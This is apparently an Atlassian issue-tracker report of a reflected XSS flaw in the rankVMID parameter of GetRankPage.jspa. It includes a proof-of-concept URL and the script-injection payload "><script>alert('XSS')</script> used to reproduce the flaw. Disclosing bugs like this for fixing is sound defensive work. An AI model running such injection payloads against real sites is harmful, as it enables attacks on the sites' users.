XSS (reflected) in rankVMID parameter of GetRankPage.jspa

2012-08-01T07:46:40
ID ATLASSIAN:JSWSERVER-5562
Type atlassian
Reporter dblack
Modified 2018-10-16T01:05:34

Description

As per https://sdog.jira.com/browse/JSTDEV-2110

Targets: https://test01.jira-dev.com/secure/GetRankPage.jspa?fieldId=customfield_10006&start=0&versionId=-1&rankVMID=field%22%3e%3cscript%3ealert('XSS')%3c/script%3e&decorator=none&selectedProjectId=10000&pageType=ChartBoard&subType=ArchiveChartBoard&type=ACB&selectedBoardId=-1&colPage=1

Reproduction: Open Target URL after login Apply attack value "><script>alert('XSS')</script> in the rankVMID parameter.